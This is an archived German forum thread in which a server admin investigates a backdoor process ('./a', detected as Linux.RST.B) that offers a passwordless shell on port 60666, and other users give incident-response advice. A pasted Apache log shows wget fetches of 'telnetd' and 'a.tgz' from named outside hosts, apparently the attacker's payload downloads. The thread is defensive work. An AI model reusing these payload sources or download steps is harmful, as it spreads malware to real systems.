PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Prozess ./a hört auf Port 60666 mit telnet shellzugang



lukewill
03.10.2004, 10:53
Hallo,

ich habe natürlich noch nicht alle entsprechenden Tutorials gelesen, von daher möge man mir etwas Unwissenheit verzeihen. Nun zu meinem Problem:

Ich habe auf meinem Server festgestellt das dort ein Prozess "./a" läuft. Dieser Prozess ist von wwwrun gestartet. Die Datei habe ich auch gefunden liegt im /tmp. Dieses Demon hört auf Port 60666, wenn ich nun auf dem Server ein telnet localhost 60666 machen, bekomme ich einen Shellzugang -ohne Passworteingabe natürlich- als wwwrun und kann freudig in Dateisystem umherschlendern.

Den Prozess habe ich natürlich beendet und die Datei kann ich natürlich auch löschen, mich würde aber viel mehr interessieren wie die Datei da hin gekommen ist und wie dieser Prozess gestartet wird.

Dann stelle ich noch fest, das in den letzten Tagen jemand versucht das rootpasswort bzw. eine passende User/passwort-kombi raus zu bekommen, im log sieht man auf jeden Fall über stunden fehl geschlagene Versuche. Dazu direkt noch ne Frage: Macht es Sinn die ip-adresse zu verfolgen und ggf. dem Provider ne Nachricht zu schicken?

Ein paar technische infos noch.

rootserver bei server4you
kernel 2.4.21
apache 2.0.48
suse 9.0

offene Ports http, pop3, imap, ssh, 10000, 389, 53

Vielen Dank schon mal
L

devilz
03.10.2004, 11:19
Lass mal rootkithunter über die kiste laufen -> http://www.rootkit.nl/projects/rootkit_hunter.html

qmasterrr
03.10.2004, 14:21
damit hast du das problem nicht gelöst der angreifer konnte einmal das programm installieren folglich kann er es auch ein 2tes mal...
also sei auf der hut den der angreifer weiß nun das du weißt das er da ist...

Mauser
03.10.2004, 17:27
hi,

ich würde dir auch installation eines tools wie aide oder tripwire raten, damit du feststellen kannst ob programme auf dem server ausgetauscht wurden.
mfg
Mauser

damager
03.10.2004, 17:51
also ich würde eine neu-installation vorschlagen...
fest steht ds sich wohl jemand zugang verschaft hat ,,, und weiter ausspioniert.
ich würde, aus neugier, mal diesen netz-verkehr tracen (ethereal, snoop, tcpdump...). einfach um zu sehen was und wohin das übertragen wird.

lukewill
03.10.2004, 20:31
Also,

ich habe mal den rkhunter laufen lassen. Es werden nur 4 Programme als Vulnerable angezeigt:

GnuPG 1.2.2
OpenSSL 0.9.7b
PHP 4.3.3
Procmail MTA 3.15.1


ausser PHP nutze ich keinen der Verdächtigen. Dann wird noch eines als unkown angezeigt: OpenSSH 3.7.1p2

Alle anderen Ausgaben sind im grünen Bereich.

Ich habe das Programm im /tmp mal durch ein Schript ersetzt, sollte derjenige also noch mal vorbei kommen müsste ich das mit bekommen.

Gegen eine neuinstallation habe ich grundsätzlich nichts, ich möchte nur vorher wissen wie das ganze abgelaufen ist. Sonst nutzt die schönste neuinstallation nix. Vielleicht habe ich die Lücke aber auch durch das letzte update geschlossen, aber um das zu entscheiden muss ich ebenfalls wissen was abgegangen ist.

Übrigens, kann ich jemanden mit den programm "a" glücklich machen :sly: , ahhh bzw. hat da jemand interesse daran :D

Viele Grüße und Danke
L

lukewill
03.10.2004, 21:02
Hallo nochmal,

hier ein paar info aus der apache errorlog:


[Wed Sep 22 15:33:56 2004] [error] [client 211.196.64.90] user database not found: /
[Wed Sep 22 15:34:01 2004] [error] [client 211.196.64.90] user database not found: /
--22:42:48-- http://membres.lycos.fr/hiddenseeker/telnetd
=> `telnetd'
Resolving membres.lycos.fr... done.
Connecting to membres.lycos.fr[212.78.204.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 170,613 [text/plain]

0K .......... .......... .......... .......... .......... 30% 157.23 KB/s
50K .......... .......... .......... .......... .......... 60% 292.40 KB/s
100K .......... .......... .......... .......... .......... 90% 396.83 KB/s
150K .......... ...... 100% 519.20 KB/s

22:42:49 (257.52 KB/s) - `telnetd' saved [170613/170613]

script not found or unable to stat
script not found or unable to stat
script not found or unable to stat
script not found or unable to stat
script not found or unable to stat
script not found or unable to stat
--16:50:42-- http://mystery.hostrocket.com/a.tgz
=> `a.tgz'
Resolving mystery.hostrocket.com... done.
Connecting to mystery.hostrocket.com[216.120.237.78]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8,086 [application/x-tar]

0K ....... 100% 78.18 KB/s

16:50:44 (78.18 KB/s) - `a.tgz' saved [8086/8086]

[Wed Sep 29 03:08:03 2004] [error] [client 218.72.115.62] user not found: /
[Wed Sep 29 13:17:35 2004] [notice] caught SIGTERM, shutting down
[Wed Sep 29 13:18:49 2004] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Wed Sep 29 13:18:49 2004] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Wed Sep 29 13:18:50 2004] [notice] Apache/2.0.48 (Linux/SuSE) configured -- resuming normal operations
[Wed Sep 29 22:18:36 2004] [error] [client 80.230.24.63] user not found: /
[Wed Sep 29 22:18:37 2004] [error] [client 80.230.24.63] user admin not found: /

......

[Fri Oct 01 12:47:28 2004] [error] [client 211.220.255.239] user wwwadmin not found: /
--15:34:39-- http://mystery.hostrocket.com/a.tgz
=> `a.tgz.1'
Auflösen des Hostnamen »mystery.hostrocket.com«.... fertig.
Verbindungsaufbau zu mystery.hostrocket.com[216.120.237.78]:80... verbunden.
HTTP Anforderung gesendet, warte auf Antwort... 200 OK
Länge: 8,086 [application/x-tar]

0K ....... 100% 78.18 KB/s

15:34:40 (78.18 KB/s) - »a.tgz.1« gespeichert [8086/8086]

script not found or unable to stat
script not found or unable to stat
[Sat Oct 02 16:24:40 2004] [notice] caught SIGTERM, shutting down
[Sat Oct 02 16:25:38 2004] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Sat Oct 02 16:25:38 2004] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Sat Oct 02 16:25:38 2004] [notice] Apache/2.0.48 (Linux/SuSE) configured -- resuming normal operations
script not found or unable to stat
[Sat Oct 02 19:56:31 2004] [notice] caught SIGTERM, shutting down

Vielleicht sagt dies ja jemanden etwas, mir noch nicht. Die Datei kann man sich immer noch an der Stelle ziehen

Viele Grüße
L

qmasterrr
03.10.2004, 22:15
mach ein whois und schreib dem besitzer des servers/domain eine mail...
das wenn nicht bald die backdoor verschwindet du rechtliche schritte einleiten wirst *G
das ganze könnet aber auch einfach eine leichtbearbeitete version von nc sein mehr braucht man nicht um eine remote shell zu bekommen.
aber eins steht fest es war kein profi sonst hätte er seine prozesse besser getarnt...

damager
03.10.2004, 22:44
stimmt, eine prozess nur "a" zu nennen ... ist schon sehr stümperhaft.
trotzdem werd ich mir das teil mal selber saugen :D ... und mal genauer angucken.

chb
03.10.2004, 23:23
a: Linux.RST.B FOUND <- Gratulation du hast nen Virus :(

http://www.clamav.net/

Da gibts nen Scanner, aber ich fürchte dein System iss schon recht beschädigt dadurch
http://vil.nai.com/vil/content/v_99978.htm

qmasterrr
04.10.2004, 06:18
http://vil.nai.com/vil/content/v_99978.htm
-Manually running the malicious file initializes the infection, if the user has emough rights to change (write to) files.

In letztertzeit fragwürdige/rechtunbekannte software installiert?

lukewill
04.10.2004, 09:36
a: Linux.RST.B FOUND <- Gratulation du hast nen Virus :(


Ich habe mich auch schon den ganzen Tag soo schlecht gefühlt.


In letztertzeit fragwürdige/rechtunbekannte software installiert?

Nicht wirklich. Wenn ich spielen oder was ausprobieren will mache ich das zuhause.

Hier (http://vil.nai.com/vil/content/v_99978.htm ) steht dann auch noch:


Note that the virus doesn't make use of a vulnerability to gain higher permissions like root rights so the infection will not be successfull for regular users


Die anderen Auswirkungen geänderte files in /bin kann ich auch nicht entdecken. Es sieht also erst mal so aus als ob nix passiert ist. Ich habe mir dann noch überlegt:

Das Teil hat auf port 60666 gelauscht, der Port ist aber in der Firewall gesperrt bzw. Verbindungsaufbau auf diesem Port ist nicht erlaubt. Damit kann doch über diesen Port keiner in das System eingedrungen sein. Dann hört der noch auf Port 80, den dürfte er doch als wwwrun gar nicht belegen und da liegt ja auch der Apache. Damit dürfte aus dieser Richtung auch keine Gefahr drohen. Ich habe mir dann noch die logfiles angeschaut und stelle auch da nix verdächtiges fest.

Ich will mir das jetzt nicht schön reden, aber es sieht nach noch mal Glück gehabt aus :bounce:

Wie seht Ihr das?

Viele Grüße
L

damager
04.10.2004, 09:46
ich pers. hätte dabei ein schlechtes bauch-gefühl aber das muss jeder selbst wissen :-)

qmasterrr
04.10.2004, 16:40
scan dein system doch wie ch-b schon gesagt hat mit http://www.clamav.net/ dann weißt du wie es um dein sys steht...

lukewill
05.10.2004, 15:13
scan dein system doch wie ch-b schon gesagt hat mit http://www.clamav.net/ dann weißt du wie es um dein sys steht...

Erledigt. Kein Befund.

Ich bin allerdings immer noch neugierig wie denn die Datei da hin gekommen ist und wie derjenige es geschafft hat das Teil auszupacken und zu starten. hat jemand vielleicht noch ne idee?

Viele Grüße
und vielen Dank an alle die sich Gedanken über das Problem gemacht haben.

L

qmasterrr
05.10.2004, 15:23
also ich tippe immernoch auf fragwürdige software...
btw: schon alle pws geändert?

Cyber
05.10.2004, 15:42
Du hast doch geschrieben, dass Du php benutzt. Hast Du irgendwo ein FORM drinne, mit dem man uploads machen kann? Evtl. hat hierueber jemand was einschleusen koennen.

lukewill
05.10.2004, 16:13
also ich tippe immernoch auf fragwürdige software...
btw: schon alle pws geändert?

Jo, passwords sind geändert.

Zuletzt installiert wurde: postfix und openldap ansonsten ist das ein Standard Suse 9.0.

Mein Tip geht eher in die Richtung lasche php - Konfiguration, das ist allerdings jetzt vorbei. Es könnte natürlich auch ein apache-bug sein. Ich denke ich komme um umfangreiche Forschungsaktivitäten nicht rum.

Installierte phpscripte sind phpmyadmin und Mambo (OS CMS, da ist mir aber kein Problem bekannt)



Du hast doch geschrieben, dass Du php benutzt. Hast Du irgendwo ein FORM drinne, mit dem man uploads machen kann? Evtl. hat hierueber jemand was einschleusen koennen.


Meines Wissens keines das einfach so zugänglich ist.

Viele Grüße
L

damager
05.10.2004, 16:58
hmmm, ob wohl:
http://www.heise.de/newsticker/meldung/51838
damit was zu tun hat :frage:

lukewill
05.10.2004, 17:13
hmmm, ob wohl:
http://www.heise.de/newsticker/meldung/51838
damit was zu tun hat :frage:

so ähnlich.

allow_url_fopen war auf on ist jetzt auf off bzw. "false", nur dafür müsste es ein script geben das code nachlädt. Da wüsste ich erstmal keines.

Es bleibt spannend :devil:

fossy
15.10.2004, 02:30
was gibt es da lange zu diskutieren? das system ist kompromitiert. reinstall und daten zurück spielen, ende. in ca. 10 min. ist die sache erledigt. und demnächst vielleicht regelmässig updaten und sich die securitylist subscriben ... und eigene scripte vom server runter, wenn man gerade mal weiss was "register globals" anrichten kann ;D

lebbe geht weiter ... warum dieser lange thread?

gruss, fossy.

lukewill
15.10.2004, 10:22
was gibt es da lange zu diskutieren? das system ist kompromitiert. reinstall und daten zurück spielen, ende. in ca. 10 min. ist die sache erledigt. und demnächst vielleicht regelmässig updaten und sich die securitylist subscriben ... und eigene scripte vom server runter, wenn man gerade mal weiss was "register globals" anrichten kann ;D

lebbe geht weiter ... warum dieser lange thread?

gruss, fossy.

Kommt mir so vor wie der übliche Hotline-Spruch "haben Sie Ihren Rechner schon neu gestartet". Es ist vollkommen sinnlos ein System neu zu installieren, wenn man nicht weiss was die Lücke war/ist. U.U. steht man dann weiter 10 min später genau da wo man vor 20 min schon mal war.

damager
15.10.2004, 11:05
fullack @ lukewill

@fossy:
das ist ein forum wo man fragen und angelegenheiten diskutieren und leiute helfen kann.
und all das ist in diesem fall noch nicht erledigt :]
weder weiss jemand was genau passiert ist und wie es passieren konnte....und geholfen ist ihm auch nicht weil er nach dem re-install das gleich schnell wieder haben könnte.
wir sind ja nicht bei windoof wo ein re-install nach einer zeit einfach MUSS wird :D

fossy
15.10.2004, 12:30
deswegen diskutieren wir ja, weil es ein forum ist und kein box-ring ;)

in 99% aller fälle liegt es an mangelnden updates oder fehlerhaften (laxen) einstellungen (entstehen auch, wenn man die alten configs bei neuen sw-releases übernimmt).
scriptkiddies proben (mit top-aktuellen exploits) alle rechner durch und knacken alle rechner die offen stehen. wenn du nicht schneller bist als die, hast du halt verloren, so ist das nun mal. wenn man den rechner neu aufsetzt ist er wieder aktuell und bietet diese sicherheitslücke mit über 90%-iger warscheinlichkeit nicht mehr. macht da also ein _einfach neuaufsetzten_ (incl. ids diesmal) keinen sinn? klar, forensic sollte man schon betreiben. aber man kann auch die logs sichern und weiter machen (vor allem, wenn sie freundlicherweise noch da sind). der typ war ja eh nen stümper, weil er seine spuren nicht verwischt hat, denn die logs waren nicht überschreiben und gegen /dev/null gelinkt. die warscheinlichkeit, dass dieser angreifer es noch mal versucht (und schafft) ist da eher gering. aber diese situation hat beim ersten mal nen hohen pädagogischen wert, und es ist wichtig sich damit auseinander zu setzen wie man in solchen situationen vorgeht. legt euch am besten einen notfallplan an. das verringert die panik.

bist du dir sicher, dass er nicht über nen anderen useraccount einloggen kann? möglich, dass er irgendwo ne binary versteckt hat, die ihm nen uid0 gibt. das system sollte auf jeden fall nur noch von nem rescue system angeschau und nicht mehr gestartet werden. selbst chroot ist u.u. gefählich.

aber all zu lange zwischen den scherben zu sitzen, wenn die vase auf dem boden liegt bringt auch nichts ;) ist halt schade drumm, aber wie gesagt: lebbe geht weiter ...

gruss und nichts für ungut, fossy.

p.s.: was mich etwas irritiert ist aber der port, der eigentlich für nen bekannten vbs-trojaner (http://pestpatrol.com/PestInfo/b/basic_hell_1_0.asp) reserviert ist ;) haben kein stiel mehr diese cracker ...

Mauser
15.10.2004, 16:43
hast du dir mal /var/log/auth.log angeschaut ? bei deinem server werden sich ja net ständig useranmelden, also müsste ein fremder login doch auffallen.